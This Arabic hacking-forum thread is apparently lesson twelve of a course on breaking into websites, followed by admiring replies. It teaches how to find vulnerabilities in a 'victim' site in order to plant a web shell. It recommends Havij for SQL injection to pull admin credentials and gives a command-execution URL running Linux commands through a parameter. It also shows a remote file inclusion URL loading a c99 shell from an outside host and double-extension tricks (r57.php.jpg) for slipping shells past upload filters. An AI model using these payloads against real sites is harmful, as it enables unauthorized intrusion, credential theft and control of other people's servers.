المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : |ألدرس الثاني عشر| الثغرات وانواعها + حديث عنها



QtRoNiX FoX
07-01-2012, 07:22 PM
بسم الله الرحمن الرحيم
السلام عليكم ورحمة لله وبركاتة
الصلاة والسلام على اشرف المرسلين وخاتم الانبياء سيدنا محمد


درسنا اليوم هو انواع الثغرات وشرحها ..

على بركة الله

كيف يتم رفع الشيل ؟؟
رفع الشل يتم عن طريق اكتشاف ثغرة معينة تمكننا من رفع الشل
يعني الشل يتم رفعة عن طريق ثغرة.
وللثغرات انواع كثيرة, وطرق اكتشافها كثير جدا جدا.

http://img819.imageshack.us/img819/3370/u8b0.gif

ما هي الثغرة ؟؟
الثغرة هي خطء برمجي يقع فيه المبرمج اثناء برمجتة لشيء.

http://img819.imageshack.us/img819/3370/u8b0.gif

ولكي تتمكن من استهداف موقع معين يجب عليك البحث عن ثغرات لكي تتمكن من رفع الشل وتخترق موقع الهدف.
وليس شرطا ان تكون هذه الثغرات داخل موقع الهدف.!
يعني لو كان الموقع المستهدف ما فية ثغرات نتركة مثلا ؟!؟
بالطبع لا.
بعد ان قمنا بجمع معلومات عن موقع الهدف (الي تحدثنا عنها بدرسنا السابق) هذه المعلومات هي التي ستساعدنا وتوصلنا الى اختراق الموقع

كيف ذلك ؟؟
لنفترض انه موقع الهدف ما فيه ثغرات اوك ؟
طيب الان بعد ان انتهينا من جمع معلومات عن موقع الهدف
مثل: مواقع السيرفر، استضافة السيرفر، IP السيرفر ...الخ
هؤلاء هم من سيمكنوننا من دعس موقع الهدف

تقلي كيف ذلك ؟؟
اقلك راجع الدرس السابق, تعرف
لانه هذا كلة حكيتة بالدرس السابق وما بدي ارجع احكية كمان مرة
مش لاني بدي اختصر
بس لاني لو اسا بدي احكيلكم كيف نستفيد من المعلومات الي جمعناها رح يكون نفس الحكي الي حكيتة بالدرس السابق.
لهيك راجع الدرس السابق الله يستر عليك :biggrin:

http://img819.imageshack.us/img819/3370/u8b0.gif

طيب يلا نبدء بالتحدث على بعض انواع الثغرات ونشرحها


1- sql injection | سكيول انجكشن | أس كيو أل انجكشن | ثغرات الحقن.

ما هي هذه الثغرة, وما هو مفعولها ؟؟
هذه الثغره روعة لانها الاكثر انتشار في هذه الايام وضروري جدا جدا ان تتعلمها لانها تفيدك كثير وتحتاجها كثير
هذه الثغره ليس مثل باقي الثغرات, يعني ثغرات الحقن SQL Injection تختلف عن باقي انواع الثغرات.
لانك تحتاج الى خبرة لكي تتمكن من استغلال هذه الثغرات

مفعولها:: بعد حقنك للموقع المصاب>> ستتمكن من سحب يوزر وباسوورد الادمن, وغالبا تكون مشفر.
تفضلو هذه دورة اسديلي لتعليم ثغرات الحقن sql injection
http://www.aljyyosh.com/vb/forumdisplay.php?f=76

وكذلك يوجد برامج لاستغلال هذه الثغرات, ومن اشهر واقوى البرامج لاستغلال ثغرات الحقن برنامج هافج Havij

http://img819.imageshack.us/img819/3370/u8b0.gif

2- Command Execution | ثغرة الكوماند | تنفيذ الاوامر.

ما هي هذه الثغرة, وما هو مفعولها ؟؟
هي الثغره جميله جدا. تمكنك من تنفيذ اوامر الينكس مباشر على الموقع دون حاجة للشل, وهذه الثغرة تعد من اخطر الثغرات
مثال على الثغرة:


www.site.com/qtronix.php?fox=ls -la
نشرحها.
www.site.com: موقع الضحية او الموقع الي يتواجد بداخلة او يملك الثغرة.
qtronix.php?: اسم الملف المصاب بالثغرة.
fox=: المتغيير المصاب والي رح يتم تنفيذ اوامر الينكس عليه.
ls -la: امر من اوامر الينكس
وظيفتة: يعرض لك جميع الملفات والمجلدات + تصاريحها + وقت انشائها ..الخ

وبالنسبة لاوامر الينكس, سبق وتحدثنا عنها وشرحناها بالتفضيل الممل وبالفيديو.
وبأمكانك مراجعة درس اوامر الينكس من هنا

القسم الاول
http://www.aljyyosh.com/vb/showthread.php?t=33974
القسم الثاني
http://www.aljyyosh.com/vb/showthread.php?t=33977

http://img819.imageshack.us/img819/3370/u8b0.gif

3-Remote File Inclusion | ثغرات فايل انكلود.

ما هي هذه الثغرة, وما هو مفعولها ؟؟
ثغرة رائعة وجميلة جدا وايضا هذة تعد من اخطر الثغرات.
تمكنك من رفع شل مباشر على الموقع, كل ما تحتاجه هو فقط شل بأمتداد txt مرفوع على موقع.
مثال على الثغرة:


http://www.site.com/qtronix.php?fox=http://www.sh3ll.org/c99.txt?
نشرحها.
www.site.com: موقع الضحية او الموقع الي يتواجد بداخلة او يملك الثغرة.
qtronix.php?: اسم الملف المصاب بالثغرة.
fox=: المتغيير المصاب والذي ستم وضع رابط الشل الي بامتداد txt عليه.
http://www.sh3ll.org/c99.txt?: هذا هو رابط الشل الي بامتداد txt, ويجب وضع علامة السؤال [؟] في نهاية رابط الشل عشان يستعرض معك الشل ..

http://img819.imageshack.us/img819/3370/u8b0.gif

4- Remote File Upload | ريموت فايل ابلود | ثغرة الرفع | ثغرة الابلود.

ما هي هذه الثغرة, وما هو مفعولها ؟؟
ثغرة رائعة وجميلة جدا وايضا هذة الثغرة تعد من اخطر الثغرات, تمكنك من رفع الشل.

تتواجد هذه الثغرات في مراكز الرفع ..
طبعا لن تكون هذه الثغرة في جميع مراكز الرفع.! بالطبع لا. اسمها ثغرة, (يعني خطء برمجي / غباء من المبرمج)
يوجد مراكز رفع تسمح لك برفع ملفات بامتداد PHP
وفي حال ما رفع معك ملف الـ PHP (الشل), بأمكانك ان تقوم بتغيير امتداد الشل الى صيغة صورة او تضغطه بالـ WinRAR ..
مثال:
r57.php.zip / r57.php.rar / r57.php.jpg ...

وفي حال ما ضبطو معك الطريقتين.. معناته المركز ما فيه ثغرة الريموت فايل ابلود, Remote File Upload

http://img819.imageshack.us/img819/3370/u8b0.gif

انتهى الدرس
اتمنى انه قد كان درس واضح ومفهوم للجميع..
ولا تنسو من صالح دعائكم..

تحياتي ..
اخوكم QtRoNiX FoX

http://img545.imageshack.us/img545/7375/uut8.png

اخلاقي تاج راسي
07-02-2012, 06:38 PM
ربي يعطيكـ العافيه
يا خي كل يوم أدخل المنتدى و اشوف نزل الدرس العاشر ولا لا
ههههه
متابع دروسكـ اول بأول بس يا ليت ما تتأخر
آحي ان جاتني نفسية هههه
الا على طاري الدروس السابقه ترا تم حفظها بنكـكـ القديم
أستمر يآ كنق
تحيايتي

QtRoNiX FoX
07-02-2012, 07:25 PM
ربي يعطيكـ العافيه
يا خي كل يوم أدخل المنتدى و اشوف نزل الدرس العاشر ولا لا
ههههه
متابع دروسكـ اول بأول بس يا ليت ما تتأخر
آحي ان جاتني نفسية هههه
الا على طاري الدروس السابقه ترا تم حفظها بنكـكـ القديم
أستمر يآ كنق
تحيايتي

هلا 'اخلاقي'
والله يالغالي انشغالات كثيرة وما بفضى كثير
بس هاي المرة كان الدرس جاهز من زمان بس ما كنت بغضر انزله لانه صارت لخبطة صغيرة
عدلت على جميع دروس الدورة وامبيرح لحتى انتهيت من التعديل واليوم لحتى فضيت انزل الدرس ...
على كل حال منور يالغالي ومشكور على ردك
تحياتي..
بالتوفيق ان شاء الله.

Tannous
07-30-2012, 12:15 AM
مشكووووووووووووور

feras2010
08-01-2012, 06:08 PM
واصل بدون فواصل يا غالي

هكر فاضي
08-14-2012, 05:16 AM
مشكور عالشرح الجميل يعطيك العافية

Marobuh Maroc
08-26-2012, 09:17 PM
مشكوووووور اخي . رااااااااااااااااءع

dark haCk
08-29-2012, 09:57 AM
يعطيك الف عافية ياغالي ~>ربي يحفظك من كل شر ع المجهود اللي تبذله وشروحاتك الرائعة :)

tfather71
09-21-2012, 06:49 PM
مشكور شرح رائع حبيبي

flashmen
09-21-2012, 08:18 PM
بارك الله فيك اخي

salahuiste
09-30-2012, 03:09 PM
مشكووووووووووووور

سارة الغامدي
10-03-2012, 05:07 AM
شرح رؤؤعة ..

zaizo max
10-03-2012, 01:46 PM
معلومات رائعة الخى الكريم
شكرا جزاك الله خيرا

jok17
10-20-2012, 01:38 PM
بارك الله فيك

(dz-adil@x-HaCkEr)
10-26-2012, 09:55 AM
بارك الله فيك اخي الغالي
شرح اكثر من رائع في انتظار الشرح المفصل لكل ثغرة على حد
بارك الله فيك دمت بالف خير

almadena7gna
10-26-2012, 02:50 PM
ششششششششششششككككككككككككك ككررررررررررااااااااااااا

(dz-adil@x-HaCkEr)
11-18-2012, 09:38 PM
السلام عليكم
بارك الله فيك اخي الغالي اكسترونيكس فوكس
في انتظار جديدك يا مبدع تقبل مروري
و شكرا

dhiahassen
12-26-2012, 10:44 PM
مشكووور والله :):):):):):):):)

issam-issam
12-27-2012, 03:00 PM
مشكوووووووووووووووووووووو ور

Black Samurai
01-08-2013, 12:28 PM
شكرااا اخى

ThEMaSk89
01-13-2013, 04:00 AM
شكرا موفق يعطيك العافيه بنتظار المزيد من شروحاتك

saif cc
01-15-2013, 03:54 AM
باركككك الله فيكككك ،

anass1234
01-15-2013, 12:40 PM
مشكور الله يعطيك العافية